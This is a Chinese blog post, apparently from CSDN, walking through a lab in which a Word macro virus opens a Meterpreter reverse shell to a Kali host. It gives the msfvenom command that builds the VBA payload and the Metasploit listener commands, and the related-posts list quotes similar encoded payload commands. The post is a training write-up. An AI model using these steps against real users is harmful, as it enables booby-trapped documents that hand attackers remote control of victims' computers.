office宏病毒反弹shell实验

已于 2024-05-17 21:18:56 修改
阅读量1.1k 收藏 16
点赞数 2
分类专栏: 笔记 文章标签: python java linux ubuntu vue
于 2020-12-10 11:10:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35493457/article/details/110949116
版权

0x00 什么是宏病毒

宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。

AutoExec:启动 Word 或加载全局模板时
    AutoNew:每次新建文档时
    AutoOpen:每次打开已有文档时
    AutoClose:每次关闭文档时

0x01 简单实验环境搭建

本次实验的环境为:

win_10
word_2013
VM_kali_linux_2018(桥接模式)

首先在电脑中word信任中心设置中,打开启动所有宏选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。

宏设置


在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。

宏创建
代码编辑界面

0x02实验开始

准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba

生成后门文件


将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址

ipconfig

在msf中设置本机监听:

use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp  #选择生成木马相同的类型
set LHOST 192.168.1.169  #设置本机ip监听
set LPORT 6666  # 设置本机监听端口
exploit  #执行监听

当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。

获取shell
星辰照耀你我
关注
专栏目录
Office宏病毒清除免疫工具
02-18
清除电脑中的宏病毒; 阻止宏病毒在文件之间感染;
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 2224
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、文档生成 三、效果检验
利用word漏洞制作Windows反弹木马
lxy123_com的博客
05-07 1342
实验环境:Windows虚拟机一台IP地址为192.168.230.4,需安装office,kali Linux虚拟机一台,IP地址192.168.230.10 实验目的:拿下Windows控制权 实验步骤: 一,部署实验环境 1,Windows安装word,配置IP地址 二,使用kali生成payload 1,打开msf生成payload 命令行输入msfconsole也可以打开 msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=19
&一个简单的宏病毒示例
dengdouweng1282的博客
06-30 2079
基于VisualBasicForApplications 其一:录制 在word,视图,,录制选项。 操作比较简单,不再赘述。 (注意根据需求选择normal还是当前文档) 例如:录制:快捷键设为空格,将某些字段设为隐藏/空白。可以隐藏信息。(虽然很简陋) 其二:编辑 视图 查看 创建 (注意根据需求选择normal还是当前文档) CDO组件发送邮件。 用了ActiveD...
VBS病毒(爱虫病毒) 源代码
miaozk2006的专栏
05-20 8278
说明:本人对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持.vbs,可以将后缀改为.vbe Dim folder, fso, foldername, ...
网络安全kali之利用感染word文档获取shell
xueshenlaila的博客
03-25 8217
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
计算机宏病毒分析及清除实验.pdf
03-28
计算机宏病毒分析及清除实验是IT安全领域中的一个重要主题,主要关注如何理解和处理宏病毒,这类病毒常通过Microsoft Office文档传播。以下是对宏病毒的基本理解、其工作原理以及清除策略的详细阐述: 一、宏病毒...
office宏病毒专杀
05-27
【标题】"Office宏病毒专杀"涉及到的是关于Microsoft Office软件中的宏病毒防治技术。宏病毒是一种利用Office文档中的语言编写,能够在用户打开含有恶意的文档时自动执行的恶意代码。这些病毒通常通过电子邮件、...
Office宏病毒专杀
04-08
如果你遇到“EXCEL保存提示隐私问题警告:此文档中包含,activx控件,或web组件......”或者excel打开提示“此工作簿已丢失其VBA项目,ActiveX控件.....”等等,赶快下载此软件安装并选择全盘杀毒吧。
OFFICE宏病毒专杀
04-08
【标题】"OFFICE宏病毒专杀"是一个专门针对Microsoft Office文档中宏病毒的清除工具。宏病毒是一种利用Microsoft Office的内置语言(如Visual Basic for Applications, VBA)编写的恶意代码,它通常隐藏在Word、...
Metasploit之宏病毒攻击演示
KEY0NE的个人博客
11-02 1204
摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:受害机:win10(192.168.8.123) 攻击机:kali(192.168.8.131)攻击演示:1、生成能反弹会话的宏病毒代码use windows/meterpreter/reverse_tcp set lhost 192...
网络安全学习日志(8)word简单宏病毒的制作
qq_41819426的博客
01-17 7851
环境及使用工具 靶机:windows7 攻击机:kali 本地主机:windows10 用于word文件生成 软件:CS4.0 对于cs的搭建,我们这里不做赘述 实验步骤: 1.宏病毒的制作 1.1创建监听 首先我们打开我们的cs4.0,点击创建一个新的监听 监听地址为你的服务端地址(这里是我的kali地址) 1.2通过attack栏来得到word宏病毒的脚本 复制其内容即可 1.3创建一个word文件,并通过视图点击创建 注意:的位置选项一定要选择最后一项,即文件的本地位置 将代码复制后保
Word宏病毒
热门推荐
qq_43717119的博客
06-22 1万+
Word宏病毒实验目的】 1、演示的编写。 2、说明的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
简单宏病毒研究
richard1230的博客
03-13 3589
原文地址:https://www.52pojie.cn/thread-705736-1-1.html 0.前言 分析这个宏病毒就像脱衣服一样,一层一层,甚是好玩。 分析难度:一颗星。 分析技巧:熟练使用各种骚工具(oledump.py;VBA Password Bypasser;VBE解码脚本) 1.样本信息 病毒文件:virus.doc MD5:fe962dc6c85a6e4e2d...
利用感染 word 文档获取windows系统的 shell
Cwillchris的博客
05-27 387
利用感染 word 文档获取window的 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) office 2016 实验步骤: 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex
检测office的恶意vba脚本(宏病毒)——mraptor
liuyanhong13的博客
09-17 2405
检测office的恶意vba脚本(宏病毒)——mraptor mraptor 是 oletools 工具集中的一个,用于 扫描一个文件中是否存在可疑的 vba 脚本,也就是宏病毒。 在进入代码之前,我们先来看下mraptor的简单使用 mraptor的使用 这里只演示扫描单个文件,mraptor 还可以遍历检测 文件夹啊和压缩包 [root@master ~]# mraptor 1.doc ​ MacroRaptor 0.55 - http://decalage.info/python/ole
1_VBA_POWERSHELL病毒分析
leibso的博客
03-17 1875
文章目录分析VBA_PS脚本: 样本信息: MD5 0bf87fd5ff555a5f0fc94b5e36f0d4ff 文件名称 0bf87fd5ff555a5f0fc94b5e36f0d4ff.doc 文件类型 Word文档 分析VBA_PS脚本: 原混淆代码: Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds A...
office漏洞利用--获取shell
weixin_33842304的博客
12-11 168
  环境:   kali系统, windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码, 会在当前...
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
wps documents
最新发布
08-29
WPS是一种可以自动执行任务的功能,它可以帮助用户在WPS文档中自动完成一系列的操作。在WPS中,用户可以使用VBA(Visual Basic for Applications)编写代码,然后通过运行来完成一些重复的、繁琐的或者复杂的任务。 有了WPS,用户可以通过自定义代码来实现一些自动化的操作,例如:自动插入、删除、修改文本、自动填充表格、自动应用格式、批量处理数据等等。用户可以根据自己的需求编写不同的代码,并将其保存在WPS文件(.wam)中。 对于文件,用户可以随时加载并运行其中的代码。在WPS文档中,用户可以通过“开发”选项卡中的“”按钮来打开编辑器,并在编辑器中编写、修改代码。在编辑器中,用户可以使用VBA编程语言进行编写,通过使用不同的命令和函数,用户可以控制文档的各种操作。 使用WPS可以极大地提高工作效率,特别是对于一些常见且需要重复操作的任务。用户只需要编写一次代码,然后就可以重复使用,并在需要的时候一键运行,从而大幅度减少了手动操作的时间和劳动成本。 总而言之,WPS是WPS文档中的一项强大功能,它允许用户自定义编写代码,实现文档中的自动化操作。通过使用WPS,用户可以提高工作效率,减少繁琐重复的劳动,使工作变得更加轻松和高效。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星辰照耀你我

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值